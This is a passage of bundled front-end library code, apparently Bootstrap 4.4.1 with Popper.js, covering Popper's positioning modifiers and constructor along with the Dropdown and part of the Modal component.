element='[x-arrow]' - Selector or node used as arrow */ element: '[x-arrow]' }, /** * Modifier used to flip the popper's placement when it starts to overlap its * reference element. * * Requires the `preventOverflow` modifier before it in order to work. * * **NOTE:** this modifier will interrupt the current update cycle and will * restart it if it detects the need to flip the placement. * @memberof modifiers * @inner */ flip: { /** @prop {number} order=600 - Index used to define the order of execution */ order: 600, /** @prop {Boolean} enabled=true - Whether the modifier is enabled or not */ enabled: true, /** @prop {ModifierFn} */ fn: flip, /** * @prop {String|Array} behavior='flip' * The behavior used to change the popper's placement. It can be one of * `flip`, `clockwise`, `counterclockwise` or an array with a list of valid * placements (with optional variations) */ behavior: 'flip', /** * @prop {number} padding=5 * The popper will flip if it hits the edges of the `boundariesElement` */ padding: 5, /** * @prop {String|HTMLElement} boundariesElement='viewport' * The element which will define the boundaries of the popper position. * The popper will never be placed outside of the defined boundaries * (except if `keepTogether` is enabled) */ boundariesElement: 'viewport', /** * @prop {Boolean} flipVariations=false * The popper will switch placement variation between `-start` and `-end` when * the reference element overlaps its boundaries. * * The original placement should have a set variation. */ flipVariations: false, /** * @prop {Boolean} flipVariationsByContent=false * The popper will switch placement variation between `-start` and `-end` when * the popper element overlaps its reference boundaries. * * The original placement should have a set variation. */ flipVariationsByContent: false }, /** * Modifier used to make the popper flow toward the inner of the reference element. * By default, when this modifier is disabled, the popper will be placed outside * the reference element. * @memberof modifiers * @inner */ inner: { /** @prop {number} order=700 - Index used to define the order of execution */ order: 700, /** @prop {Boolean} enabled=false - Whether the modifier is enabled or not */ enabled: false, /** @prop {ModifierFn} */ fn: inner }, /** * Modifier used to hide the popper when its reference element is outside of the * popper boundaries. It will set a `x-out-of-boundaries` attribute which can * be used to hide with a CSS selector the popper when its reference is * out of boundaries. * * Requires the `preventOverflow` modifier before it in order to work. * @memberof modifiers * @inner */ hide: { /** @prop {number} order=800 - Index used to define the order of execution */ order: 800, /** @prop {Boolean} enabled=true - Whether the modifier is enabled or not */ enabled: true, /** @prop {ModifierFn} */ fn: hide }, /** * Computes the style that will be applied to the popper element to gets * properly positioned. * * Note that this modifier will not touch the DOM, it just prepares the styles * so that `applyStyle` modifier can apply it. This separation is useful * in case you need to replace `applyStyle` with a custom implementation. * * This modifier has `850` as `order` value to maintain backward compatibility * with previous versions of Popper.js. Expect the modifiers ordering method * to change in future major versions of the library. * * @memberof modifiers * @inner */ computeStyle: { /** @prop {number} order=850 - Index used to define the order of execution */ order: 850, /** @prop {Boolean} enabled=true - Whether the modifier is enabled or not */ enabled: true, /** @prop {ModifierFn} */ fn: computeStyle, /** * @prop {Boolean} gpuAcceleration=true * If true, it uses the CSS 3D transformation to position the popper. * Otherwise, it will use the `top` and `left` properties */ gpuAcceleration: true, /** * @prop {string} [x='bottom'] * Where to anchor the X axis (`bottom` or `top`). AKA X offset origin. * Change this if your popper should grow in a direction different from `bottom` */ x: 'bottom', /** * @prop {string} [x='left'] * Where to anchor the Y axis (`left` or `right`). AKA Y offset origin. * Change this if your popper should grow in a direction different from `right` */ y: 'right' }, /** * Applies the computed styles to the popper element. * * All the DOM manipulations are limited to this modifier. This is useful in case * you want to integrate Popper.js inside a framework or view library and you * want to delegate all the DOM manipulations to it. * * Note that if you disable this modifier, you must make sure the popper element * has its position set to `absolute` before Popper.js can do its work! * * Just disable this modifier and define your own to achieve the desired effect. * * @memberof modifiers * @inner */ applyStyle: { /** @prop {number} order=900 - Index used to define the order of execution */ order: 900, /** @prop {Boolean} enabled=true - Whether the modifier is enabled or not */ enabled: true, /** @prop {ModifierFn} */ fn: applyStyle, /** @prop {Function} */ onLoad: applyStyleOnLoad, /** * @deprecated since version 1.10.0, the property moved to `computeStyle` modifier * @prop {Boolean} gpuAcceleration=true * If true, it uses the CSS 3D transformation to position the popper. * Otherwise, it will use the `top` and `left` properties */ gpuAcceleration: undefined } }; /** * The `dataObject` is an object containing all the information used by Popper.js. * This object is passed to modifiers and to the `onCreate` and `onUpdate` callbacks. * @name dataObject * @property {Object} data.instance The Popper.js instance * @property {String} data.placement Placement applied to popper * @property {String} data.originalPlacement Placement originally defined on init * @property {Boolean} data.flipped True if popper has been flipped by flip modifier * @property {Boolean} data.hide True if the reference element is out of boundaries, useful to know when to hide the popper * @property {HTMLElement} data.arrowElement Node used as arrow by arrow modifier * @property {Object} data.styles Any CSS property defined here will be applied to the popper. It expects the JavaScript nomenclature (eg. `marginBottom`) * @property {Object} data.arrowStyles Any CSS property defined here will be applied to the popper arrow. It expects the JavaScript nomenclature (eg. `marginBottom`) * @property {Object} data.boundaries Offsets of the popper boundaries * @property {Object} data.offsets The measurements of popper, reference and arrow elements * @property {Object} data.offsets.popper `top`, `left`, `width`, `height` values * @property {Object} data.offsets.reference `top`, `left`, `width`, `height` values * @property {Object} data.offsets.arrow] `top` and `left` offsets, only one of them will be different from 0 */ /** * Default options provided to Popper.js constructor.
* These can be overridden using the `options` argument of Popper.js.
* To override an option, simply pass an object with the same * structure of the `options` object, as the 3rd argument. For example: * ``` * new Popper(ref, pop, { * modifiers: { * preventOverflow: { enabled: false } * } * }) * ``` * @type {Object} * @static * @memberof Popper */ var Defaults = { /** * Popper's placement. * @prop {Popper.placements} placement='bottom' */ placement: 'bottom', /** * Set this to true if you want popper to position it self in 'fixed' mode * @prop {Boolean} positionFixed=false */ positionFixed: false, /** * Whether events (resize, scroll) are initially enabled. * @prop {Boolean} eventsEnabled=true */ eventsEnabled: true, /** * Set to true if you want to automatically remove the popper when * you call the `destroy` method. * @prop {Boolean} removeOnDestroy=false */ removeOnDestroy: false, /** * Callback called when the popper is created.
* By default, it is set to no-op.
* Access Popper.js instance with `data.instance`. * @prop {onCreate} */ onCreate: function onCreate() {}, /** * Callback called when the popper is updated. This callback is not called * on the initialization/creation of the popper, but only on subsequent * updates.
* By default, it is set to no-op.
* Access Popper.js instance with `data.instance`. * @prop {onUpdate} */ onUpdate: function onUpdate() {}, /** * List of modifiers used to modify the offsets before they are applied to the popper. * They provide most of the functionalities of Popper.js. * @prop {modifiers} */ modifiers: modifiers }; /** * @callback onCreate * @param {dataObject} data */ /** * @callback onUpdate * @param {dataObject} data */ // Utils // Methods var Popper = function () { /** * Creates a new Popper.js instance. * @class Popper * @param {Element|referenceObject} reference - The reference element used to position the popper * @param {Element} popper - The HTML / XML element used as the popper * @param {Object} options - Your custom options to override the ones defined in [Defaults](#defaults) * @return {Object} instance - The generated Popper.js instance */ function Popper(reference, popper) { var _this = this; var options = arguments.length > 2 && arguments[2] !== undefined ? arguments[2] : {}; classCallCheck(this, Popper); this.scheduleUpdate = function () { return requestAnimationFrame(_this.update); }; // make update() debounced, so that it only runs at most once-per-tick this.update = debounce(this.update.bind(this)); // with {} we create a new object with the options inside it this.options = _extends({}, Popper.Defaults, options); // init state this.state = { isDestroyed: false, isCreated: false, scrollParents: [] }; // get reference and popper elements (allow jQuery wrappers) this.reference = reference && reference.jquery ? reference[0] : reference; this.popper = popper && popper.jquery ? popper[0] : popper; // Deep merge modifiers options this.options.modifiers = {}; Object.keys(_extends({}, Popper.Defaults.modifiers, options.modifiers)).forEach(function (name) { _this.options.modifiers[name] = _extends({}, Popper.Defaults.modifiers[name] || {}, options.modifiers ? options.modifiers[name] : {}); }); // Refactoring modifiers' list (Object => Array) this.modifiers = Object.keys(this.options.modifiers).map(function (name) { return _extends({ name: name }, _this.options.modifiers[name]); }) // sort the modifiers by order .sort(function (a, b) { return a.order - b.order; }); // modifiers have the ability to execute arbitrary code when Popper.js get inited // such code is executed in the same order of its modifier // they could add new properties to their options configuration // BE AWARE: don't add options to `options.modifiers.name` but to `modifierOptions`! this.modifiers.forEach(function (modifierOptions) { if (modifierOptions.enabled && isFunction(modifierOptions.onLoad)) { modifierOptions.onLoad(_this.reference, _this.popper, _this.options, modifierOptions, _this.state); } }); // fire the first update to position the popper in the right place this.update(); var eventsEnabled = this.options.eventsEnabled; if (eventsEnabled) { // setup event listeners, they will take care of update the position in specific situations this.enableEventListeners(); } this.state.eventsEnabled = eventsEnabled; } // We can't use class properties because they don't get listed in the // class prototype and break stuff like Sinon stubs createClass(Popper, [{ key: 'update', value: function update$$1() { return update.call(this); } }, { key: 'destroy', value: function destroy$$1() { return destroy.call(this); } }, { key: 'enableEventListeners', value: function enableEventListeners$$1() { return enableEventListeners.call(this); } }, { key: 'disableEventListeners', value: function disableEventListeners$$1() { return disableEventListeners.call(this); } /** * Schedules an update. It will run on the next UI update available. * @method scheduleUpdate * @memberof Popper */ /** * Collection of utilities useful when writing custom modifiers. * Starting from version 1.7, this method is available only if you * include `popper-utils.js` before `popper.js`. * * **DEPRECATION**: This way to access PopperUtils is deprecated * and will be removed in v2! Use the PopperUtils module directly instead. * Due to the high instability of the methods contained in Utils, we can't * guarantee them to follow semver. Use them at your own risk! * @static * @private * @type {Object} * @deprecated since version 1.8 * @member Utils * @memberof Popper */ }]); return Popper; }(); /** * The `referenceObject` is an object that provides an interface compatible with Popper.js * and lets you use it as replacement of a real DOM node.
* You can use this method to position a popper relatively to a set of coordinates * in case you don't have a DOM node to use as reference. * * ``` * new Popper(referenceObject, popperNode); * ``` * * NB: This feature isn't supported in Internet Explorer 10. * @name referenceObject * @property {Function} data.getBoundingClientRect * A function that returns a set of coordinates compatible with the native `getBoundingClientRect` method. * @property {number} data.clientWidth * An ES6 getter that will return the width of the virtual reference element. * @property {number} data.clientHeight * An ES6 getter that will return the height of the virtual reference element. */ Popper.Utils = (typeof window !== 'undefined' ? window : global).PopperUtils; Popper.placements = placements; Popper.Defaults = Defaults; /** * ------------------------------------------------------------------------ * Constants * ------------------------------------------------------------------------ */ var NAME$4 = 'dropdown'; var VERSION$4 = '4.4.1'; var DATA_KEY$4 = 'bs.dropdown'; var EVENT_KEY$4 = "." + DATA_KEY$4; var DATA_API_KEY$4 = '.data-api'; var JQUERY_NO_CONFLICT$4 = $.fn[NAME$4]; var ESCAPE_KEYCODE = 27; // KeyboardEvent.which value for Escape (Esc) key var SPACE_KEYCODE = 32; // KeyboardEvent.which value for space key var TAB_KEYCODE = 9; // KeyboardEvent.which value for tab key var ARROW_UP_KEYCODE = 38; // KeyboardEvent.which value for up arrow key var ARROW_DOWN_KEYCODE = 40; // KeyboardEvent.which value for down arrow key var RIGHT_MOUSE_BUTTON_WHICH = 3; // MouseEvent.which value for the right button (assuming a right-handed mouse) var REGEXP_KEYDOWN = new RegExp(ARROW_UP_KEYCODE + "|" + ARROW_DOWN_KEYCODE + "|" + ESCAPE_KEYCODE); var Event$4 = { HIDE: "hide" + EVENT_KEY$4, HIDDEN: "hidden" + EVENT_KEY$4, SHOW: "show" + EVENT_KEY$4, SHOWN: "shown" + EVENT_KEY$4, CLICK: "click" + EVENT_KEY$4, CLICK_DATA_API: "click" + EVENT_KEY$4 + DATA_API_KEY$4, KEYDOWN_DATA_API: "keydown" + EVENT_KEY$4 + DATA_API_KEY$4, KEYUP_DATA_API: "keyup" + EVENT_KEY$4 + DATA_API_KEY$4 }; var ClassName$4 = { DISABLED: 'disabled', SHOW: 'show', DROPUP: 'dropup', DROPRIGHT: 'dropright', DROPLEFT: 'dropleft', MENURIGHT: 'dropdown-menu-right', MENULEFT: 'dropdown-menu-left', POSITION_STATIC: 'position-static' }; var Selector$4 = { DATA_TOGGLE: '[data-toggle="dropdown"]', FORM_CHILD: '.dropdown form', MENU: '.dropdown-menu', NAVBAR_NAV: '.navbar-nav', VISIBLE_ITEMS: '.dropdown-menu .dropdown-item:not(.disabled):not(:disabled)' }; var AttachmentMap = { TOP: 'top-start', TOPEND: 'top-end', BOTTOM: 'bottom-start', BOTTOMEND: 'bottom-end', RIGHT: 'right-start', RIGHTEND: 'right-end', LEFT: 'left-start', LEFTEND: 'left-end' }; var Default$2 = { offset: 0, flip: true, boundary: 'scrollParent', reference: 'toggle', display: 'dynamic', popperConfig: null }; var DefaultType$2 = { offset: '(number|string|function)', flip: 'boolean', boundary: '(string|element)', reference: '(string|element)', display: 'string', popperConfig: '(null|object)' }; /** * ------------------------------------------------------------------------ * Class Definition * ------------------------------------------------------------------------ */ var Dropdown = /*#__PURE__*/ function () { function Dropdown(element, config) { this._element = element; this._popper = null; this._config = this._getConfig(config); this._menu = this._getMenuElement(); this._inNavbar = this._detectNavbar(); this._addEventListeners(); } // Getters var _proto = Dropdown.prototype; // Public _proto.toggle = function toggle() { if (this._element.disabled || $(this._element).hasClass(ClassName$4.DISABLED)) { return; } var isActive = $(this._menu).hasClass(ClassName$4.SHOW); Dropdown._clearMenus(); if (isActive) { return; } this.show(true); }; _proto.show = function show(usePopper) { if (usePopper === void 0) { usePopper = false; } if (this._element.disabled || $(this._element).hasClass(ClassName$4.DISABLED) || $(this._menu).hasClass(ClassName$4.SHOW)) { return; } var relatedTarget = { relatedTarget: this._element }; var showEvent = $.Event(Event$4.SHOW, relatedTarget); var parent = Dropdown._getParentFromElement(this._element); $(parent).trigger(showEvent); if (showEvent.isDefaultPrevented()) { return; } // Disable totally Popper.js for Dropdown in Navbar if (!this._inNavbar && usePopper) { /** * Check for Popper dependency * Popper - https://popper.js.org */ if (typeof Popper === 'undefined') { throw new TypeError('Bootstrap\'s dropdowns require Popper.js (https://popper.js.org/)'); } var referenceElement = this._element; if (this._config.reference === 'parent') { referenceElement = parent; } else if (Util.isElement(this._config.reference)) { referenceElement = this._config.reference; // Check if it's jQuery element if (typeof this._config.reference.jquery !== 'undefined') { referenceElement = this._config.reference[0]; } } // If boundary is not `scrollParent`, then set position to `static` // to allow the menu to "escape" the scroll parent's boundaries // https://github.com/twbs/bootstrap/issues/24251 if (this._config.boundary !== 'scrollParent') { $(parent).addClass(ClassName$4.POSITION_STATIC); } this._popper = new Popper(referenceElement, this._menu, this._getPopperConfig()); } // If this is a touch-enabled device we add extra // empty mouseover listeners to the body's immediate children; // only needed because of broken event delegation on iOS // https://www.quirksmode.org/blog/archives/2014/02/mouse_event_bub.html if ('ontouchstart' in document.documentElement && $(parent).closest(Selector$4.NAVBAR_NAV).length === 0) { $(document.body).children().on('mouseover', null, $.noop); } this._element.focus(); this._element.setAttribute('aria-expanded', true); $(this._menu).toggleClass(ClassName$4.SHOW); $(parent).toggleClass(ClassName$4.SHOW).trigger($.Event(Event$4.SHOWN, relatedTarget)); }; _proto.hide = function hide() { if (this._element.disabled || $(this._element).hasClass(ClassName$4.DISABLED) || !$(this._menu).hasClass(ClassName$4.SHOW)) { return; } var relatedTarget = { relatedTarget: this._element }; var hideEvent = $.Event(Event$4.HIDE, relatedTarget); var parent = Dropdown._getParentFromElement(this._element); $(parent).trigger(hideEvent); if (hideEvent.isDefaultPrevented()) { return; } if (this._popper) { this._popper.destroy(); } $(this._menu).toggleClass(ClassName$4.SHOW); $(parent).toggleClass(ClassName$4.SHOW).trigger($.Event(Event$4.HIDDEN, relatedTarget)); }; _proto.dispose = function dispose() { $.removeData(this._element, DATA_KEY$4); $(this._element).off(EVENT_KEY$4); this._element = null; this._menu = null; if (this._popper !== null) { this._popper.destroy(); this._popper = null; } }; _proto.update = function update() { this._inNavbar = this._detectNavbar(); if (this._popper !== null) { this._popper.scheduleUpdate(); } } // Private ; _proto._addEventListeners = function _addEventListeners() { var _this = this; $(this._element).on(Event$4.CLICK, function (event) { event.preventDefault(); event.stopPropagation(); _this.toggle(); }); }; _proto._getConfig = function _getConfig(config) { config = _objectSpread2({}, this.constructor.Default, {}, $(this._element).data(), {}, config); Util.typeCheckConfig(NAME$4, config, this.constructor.DefaultType); return config; }; _proto._getMenuElement = function _getMenuElement() { if (!this._menu) { var parent = Dropdown._getParentFromElement(this._element); if (parent) { this._menu = parent.querySelector(Selector$4.MENU); } } return this._menu; }; _proto._getPlacement = function _getPlacement() { var $parentDropdown = $(this._element.parentNode); var placement = AttachmentMap.BOTTOM; // Handle dropup if ($parentDropdown.hasClass(ClassName$4.DROPUP)) { placement = AttachmentMap.TOP; if ($(this._menu).hasClass(ClassName$4.MENURIGHT)) { placement = AttachmentMap.TOPEND; } } else if ($parentDropdown.hasClass(ClassName$4.DROPRIGHT)) { placement = AttachmentMap.RIGHT; } else if ($parentDropdown.hasClass(ClassName$4.DROPLEFT)) { placement = AttachmentMap.LEFT; } else if ($(this._menu).hasClass(ClassName$4.MENURIGHT)) { placement = AttachmentMap.BOTTOMEND; } return placement; }; _proto._detectNavbar = function _detectNavbar() { return $(this._element).closest('.navbar').length > 0; }; _proto._getOffset = function _getOffset() { var _this2 = this; var offset = {}; if (typeof this._config.offset === 'function') { offset.fn = function (data) { data.offsets = _objectSpread2({}, data.offsets, {}, _this2._config.offset(data.offsets, _this2._element) || {}); return data; }; } else { offset.offset = this._config.offset; } return offset; }; _proto._getPopperConfig = function _getPopperConfig() { var popperConfig = { placement: this._getPlacement(), modifiers: { offset: this._getOffset(), flip: { enabled: this._config.flip }, preventOverflow: { boundariesElement: this._config.boundary } } }; // Disable Popper.js if we have a static display if (this._config.display === 'static') { popperConfig.modifiers.applyStyle = { enabled: false }; } return _objectSpread2({}, popperConfig, {}, this._config.popperConfig); } // Static ; Dropdown._jQueryInterface = function _jQueryInterface(config) { return this.each(function () { var data = $(this).data(DATA_KEY$4); var _config = typeof config === 'object' ? config : null; if (!data) { data = new Dropdown(this, _config); $(this).data(DATA_KEY$4, data); } if (typeof config === 'string') { if (typeof data[config] === 'undefined') { throw new TypeError("No method named \"" + config + "\""); } data[config](); } }); }; Dropdown._clearMenus = function _clearMenus(event) { if (event && (event.which === RIGHT_MOUSE_BUTTON_WHICH || event.type === 'keyup' && event.which !== TAB_KEYCODE)) { return; } var toggles = [].slice.call(document.querySelectorAll(Selector$4.DATA_TOGGLE)); for (var i = 0, len = toggles.length; i < len; i++) { var parent = Dropdown._getParentFromElement(toggles[i]); var context = $(toggles[i]).data(DATA_KEY$4); var relatedTarget = { relatedTarget: toggles[i] }; if (event && event.type === 'click') { relatedTarget.clickEvent = event; } if (!context) { continue; } var dropdownMenu = context._menu; if (!$(parent).hasClass(ClassName$4.SHOW)) { continue; } if (event && (event.type === 'click' && /input|textarea/i.test(event.target.tagName) || event.type === 'keyup' && event.which === TAB_KEYCODE) && $.contains(parent, event.target)) { continue; } var hideEvent = $.Event(Event$4.HIDE, relatedTarget); $(parent).trigger(hideEvent); if (hideEvent.isDefaultPrevented()) { continue; } // If this is a touch-enabled device we remove the extra // empty mouseover listeners we added for iOS support if ('ontouchstart' in document.documentElement) { $(document.body).children().off('mouseover', null, $.noop); } toggles[i].setAttribute('aria-expanded', 'false'); if (context._popper) { context._popper.destroy(); } $(dropdownMenu).removeClass(ClassName$4.SHOW); $(parent).removeClass(ClassName$4.SHOW).trigger($.Event(Event$4.HIDDEN, relatedTarget)); } }; Dropdown._getParentFromElement = function _getParentFromElement(element) { var parent; var selector = Util.getSelectorFromElement(element); if (selector) { parent = document.querySelector(selector); } return parent || element.parentNode; } // eslint-disable-next-line complexity ; Dropdown._dataApiKeydownHandler = function _dataApiKeydownHandler(event) { // If not input/textarea: // - And not a key in REGEXP_KEYDOWN => not a dropdown command // If input/textarea: // - If space key => not a dropdown command // - If key is other than escape // - If key is not up or down => not a dropdown command // - If trigger inside the menu => not a dropdown command if (/input|textarea/i.test(event.target.tagName) ? event.which === SPACE_KEYCODE || event.which !== ESCAPE_KEYCODE && (event.which !== ARROW_DOWN_KEYCODE && event.which !== ARROW_UP_KEYCODE || $(event.target).closest(Selector$4.MENU).length) : !REGEXP_KEYDOWN.test(event.which)) { return; } event.preventDefault(); event.stopPropagation(); if (this.disabled || $(this).hasClass(ClassName$4.DISABLED)) { return; } var parent = Dropdown._getParentFromElement(this); var isActive = $(parent).hasClass(ClassName$4.SHOW); if (!isActive && event.which === ESCAPE_KEYCODE) { return; } if (!isActive || isActive && (event.which === ESCAPE_KEYCODE || event.which === SPACE_KEYCODE)) { if (event.which === ESCAPE_KEYCODE) { var toggle = parent.querySelector(Selector$4.DATA_TOGGLE); $(toggle).trigger('focus'); } $(this).trigger('click'); return; } var items = [].slice.call(parent.querySelectorAll(Selector$4.VISIBLE_ITEMS)).filter(function (item) { return $(item).is(':visible'); }); if (items.length === 0) { return; } var index = items.indexOf(event.target); if (event.which === ARROW_UP_KEYCODE && index > 0) { // Up index--; } if (event.which === ARROW_DOWN_KEYCODE && index < items.length - 1) { // Down index++; } if (index < 0) { index = 0; } items[index].focus(); }; _createClass(Dropdown, null, [{ key: "VERSION", get: function get() { return VERSION$4; } }, { key: "Default", get: function get() { return Default$2; } }, { key: "DefaultType", get: function get() { return DefaultType$2; } }]); return Dropdown; }(); /** * ------------------------------------------------------------------------ * Data Api implementation * ------------------------------------------------------------------------ */ $(document).on(Event$4.KEYDOWN_DATA_API, Selector$4.DATA_TOGGLE, Dropdown._dataApiKeydownHandler).on(Event$4.KEYDOWN_DATA_API, Selector$4.MENU, Dropdown._dataApiKeydownHandler).on(Event$4.CLICK_DATA_API + " " + Event$4.KEYUP_DATA_API, Dropdown._clearMenus).on(Event$4.CLICK_DATA_API, Selector$4.DATA_TOGGLE, function (event) { event.preventDefault(); event.stopPropagation(); Dropdown._jQueryInterface.call($(this), 'toggle'); }).on(Event$4.CLICK_DATA_API, Selector$4.FORM_CHILD, function (e) { e.stopPropagation(); }); /** * ------------------------------------------------------------------------ * jQuery * ------------------------------------------------------------------------ */ $.fn[NAME$4] = Dropdown._jQueryInterface; $.fn[NAME$4].Constructor = Dropdown; $.fn[NAME$4].noConflict = function () { $.fn[NAME$4] = JQUERY_NO_CONFLICT$4; return Dropdown._jQueryInterface; }; /** * ------------------------------------------------------------------------ * Constants * ------------------------------------------------------------------------ */ var NAME$5 = 'modal'; var VERSION$5 = '4.4.1'; var DATA_KEY$5 = 'bs.modal'; var EVENT_KEY$5 = "." + DATA_KEY$5; var DATA_API_KEY$5 = '.data-api'; var JQUERY_NO_CONFLICT$5 = $.fn[NAME$5]; var ESCAPE_KEYCODE$1 = 27; // KeyboardEvent.which value for Escape (Esc) key var Default$3 = { backdrop: true, keyboard: true, focus: true, show: true }; var DefaultType$3 = { backdrop: '(boolean|string)', keyboard: 'boolean', focus: 'boolean', show: 'boolean' }; var Event$5 = { HIDE: "hide" + EVENT_KEY$5, HIDE_PREVENTED: "hidePrevented" + EVENT_KEY$5, HIDDEN: "hidden" + EVENT_KEY$5, SHOW: "show" + EVENT_KEY$5, SHOWN: "shown" + EVENT_KEY$5, FOCUSIN: "focusin" + EVENT_KEY$5, RESIZE: "resize" + EVENT_KEY$5, CLICK_DISMISS: "click.dismiss" + EVENT_KEY$5, KEYDOWN_DISMISS: "keydown.dismiss" + EVENT_KEY$5, MOUSEUP_DISMISS: "mouseup.dismiss" + EVENT_KEY$5, MOUSEDOWN_DISMISS: "mousedown.dismiss" + EVENT_KEY$5, CLICK_DATA_API: "click" + EVENT_KEY$5 + DATA_API_KEY$5 }; var ClassName$5 = { SCROLLABLE: 'modal-dialog-scrollable', SCROLLBAR_MEASURER: 'modal-scrollbar-measure', BACKDROP: 'modal-backdrop', OPEN: 'modal-open', FADE: 'fade', SHOW: 'show', STATIC: 'modal-static' }; var Selector$5 = { DIALOG: '.modal-dialog', MODAL_BODY: '.modal-body', DATA_TOGGLE: '[data-toggle="modal"]', DATA_DISMISS: '[data-dismiss="modal"]', FIXED_CONTENT: '.fixed-top, .fixed-bottom, .is-fixed, .sticky-top', STICKY_CONTENT: '.sticky-top' }; /** * ------------------------------------------------------------------------ * Class Definition * ------------------------------------------------------------------------ */ var Modal = /*#__PURE__*/ function () { function Modal(element, config) { this._config = this._getConfig(config); this._element = element; this._dialog = element.querySelector(Selector$5.DIALOG); this._backdrop = null; this._isShown = false; this._isBodyOverflowing = false; this._ignoreBackdropClick = false; this._isTransitioning = false; this._scrollbarWidth = 0; } // Getters var _proto = Modal.prototype; // Public _proto.toggle = function toggle(relatedTarget) { return this._isShown ? this.hide() : this.show(relatedTarget); }; _proto.show = function show(relatedTarget) { var _this = this; if (this._isShown || this._isTransitioning) { return; } if ($(this._element).hasClass(ClassName$5.FADE)) { this._isTransitioning = true; } var showEvent = $.Event(Event$5.SHOW, { relatedTarget: relatedTarget }); $(this._element).trigger(showEvent); if (this._isShown || showEvent.isDefaultPrevented()) { return; } this._isShown = true; this._checkScrollbar(); this._setScrollbar(); this._adjustDialog(); this._setEscapeEvent(); this._setResizeEvent(); $(this._element).on(Event$5.CLICK_DISMISS, Selector$5.DATA_DISMISS, function (event) { return _this.hide(event); }); $(this._dialog).on(Event$5.MOUSEDOWN_DISMISS, function () { $(_this._element).one(Event$5.MOUSEUP_DISMISS, function (event) { if ($(event.target).is(_this._element)) { _this._ignoreBackdropClick = true; } }); }); this._showBackdrop(function () { return _this._showElement(relatedTarget); }); }; _proto.hide = function hide(event) { var _this2 = this; if (event) { event.preventDefault(); } if (!this._isShown || this._isTransitioning) { return; } var hideEvent = $.Event(Event$5.HIDE); $(this._element).trigger(hideEvent); if (!this._isShown || hideEvent.isDefaultPrevented()) { return; } this._isShown = false; var transition = $(this._element).hasClass(ClassName$5.FADE); if (transition) { this._isTransitioning = true; } this._setEscapeEvent(); this._setResizeEvent(); $(document).off(Event$5.FOCUSIN); $(this._element).removeClass(ClassName$5.SHOW); $(this._element).off(Event$5.CLICK_DISMISS); $(this._dialog).off(Event$5.MOUSEDOWN_DISMISS); if (transition) { var transitionDuration = Util.getTransitionDurationFromElement(this._element); $(this._element).one(Util.TRANSITION_END, function (event) { return _this2._hideModal(event); }).emulateTransitionEnd(transitionDuration); } else { this._hideModal(); } }; _proto.dispose = function dispose() { [window, this._element, this._dialog].forEach(function (htmlElement) { return $(htmlElement).off(EVENT_KEY$5); }); /** * `document` has 2 events `Event.FOCUSIN` and `Event.CLICK_DATA_API` * Do not move `document` in `htmlElements` array * It will remove `Event.CLICK_DATA_API` event that should remain */ $(document).off(Event$5.FOCUSIN); $.removeData(this._element, DATA_KEY$5); this._config = null; this._element = null; this._dialog = null; this._backdrop = null; this._isShown = null; this._isBodyOverflowing = null; this._ignoreBackdropClick = null; this._isTransitioning = null; this._scrollbarWidth = null; }; _proto.handleUpdate = function handleUpdate() { this._adjustDialog(); } // Private ; _proto._getConfig = function _getConfig(config) { config = _objectSpread2({}, Default$3, {}, config); Util.typeCheckConfig(NAME$5, config, DefaultType$3); return config; }; _proto._triggerBackdropTransition = function _triggerBackdropTransition() { var _this3 = this; if (this._config.backdrop === 'static') { var hideEventPrevented = $.Event(Event$5.HIDE_PREVENTED); $(this._element).trigger(hideEventPrevented); if (hideEventPrevented.defaultPrevented) { return; } this._element.classList.add(ClassName$5.STATIC); var modalTransitionDuration = Util.getTransitionDurationFromElement(this._element); $(this._element).one(Util.TRANSITION_END, function () { _this3._element.classList.remove(ClassName$5.STATIC); }).emulateTransitionEnd(modalTransitionDuration); this._element.focus(); } else { this.hide(); } }; _proto._showElement = function _showElement(relatedTarget) { var _this4 = this; var transition = $(this._element).hasClass(ClassName$5.FADE); var modalBody = this._dialog ? this._dialog.querySelector(Selector$5.MODAL_BODY) : null; if (!this._element.parentNode || this._element.parentNode.nodeType !== Node.ELEMENT_NODE) { // Don't move modal's DOM position document.body.appendChild(this._element); } this._element.style.display = 'block'; this._element.removeAttribute('aria-hidden'); this._element.setAttribute('aria-modal', true); if ($(this._dialog).hasClass(ClassName$5.SCROLLABLE) && modalBody) { modalBody.scrollTop = 0; } else { this._element.scrollTop = 0; } if (transition) { Util.reflow(this._element); } $(this._element).addClass(ClassName$5.SHOW); if (this._config.focus) { this._enforceFocus(); } var shownEvent = $.Event(Event$5.SHOWN, { relatedTarget: relatedTarget }); var transitionComplete = function transitionComplete() { if (_this4._config.focus) { _this4._element.focus(); } _this4._isTransitioning = false; $(_this4._element).trigger(shownEvent); }; if (transition) { var transitionDuration = Util.getTransitionDurationFromElement(this._dialog); $(this._dialog).one(Util.TRANSITION_END, transitionComplete).emulateTransitionEnd(transitionDuration); } else { transitionComplete(); } }; _proto._enforceFocus = function _enforceFocus() { var _this5 = this; $(document).off(Event$5.FOCUSIN) // Guard against infinite focus loop .on(Event$5.FOCUSIN, function (event) { if (document !== event.target && _this5._element !== event.target && $(_this5._element).has(event.target).length === 0) { _this5._element.focus(); } }); }; _proto._setEscapeEvent = function _setEscapeEvent() { var _this6 = this; if (this._isShown && this._config.keyboard) { $(this._element).on(Event$5.KEYDOWN_DISMISS, function (event) { if (event.which === ESCAPE_KEYCODE$1) { _this6._triggerBackdropTransition(); } }); } else if (!this._isShown) { $(this._element).off(Event$5.KEYDOWN_DISMISS); } }; _proto._setResizeEvent = function _setResizeEvent() { var _this7 = this; if (this._isShown) { $(window).on(Event$5.RESIZE, function (event) { return _this7.handleUpdate(event); }); } else { $(window).off(Event$5.RESIZE); } }; _proto._hideModal = function _hideModal() { var _this8 = this; this._element.style.display = 'none'; this._element.setAttribute('aria-hidden', true); this._element.removeAttribute('aria-modal'); this._isTransitioning = false; this._showBackdrop(function () { $(document.body).removeClass(ClassName$5.OPEN); _this8._resetAdjustments(); _this8._resetScrollbar(); $(_this8._element).trigger(Event$5.HIDDEN); }); }; _proto._removeBackdrop = function _removeBackdrop() { if (this._backdrop) { $(this._backdrop).remove(); this._backdrop = null; } }; _proto._showBackdrop = function _showBackdrop(callback) { var _this9 = this; var animate = $(this._element).hasClass(ClassName$5.FADE) ? ClassName$5.FADE : ''; if (this._isShown && this._config.backdrop) { this._backdrop = document.createElement('div'); this._backdrop.className = ClassName$5.BACKDROP; if (animate) { this._backdrop.classList.add(animate); } $(this._backdrop).appendTo(document.body); $(this._element).on(Event$5.CLICK_DISMISS, function (event) { if (_this9._ignoreBackdropClick) { _this9._ignoreBackdropClick = false; return; } if (event.target !== event.currentTarget) { return; } _this9._triggerBackdropTransition(); }); if (animate) { Util.reflow(this._backdrop); } 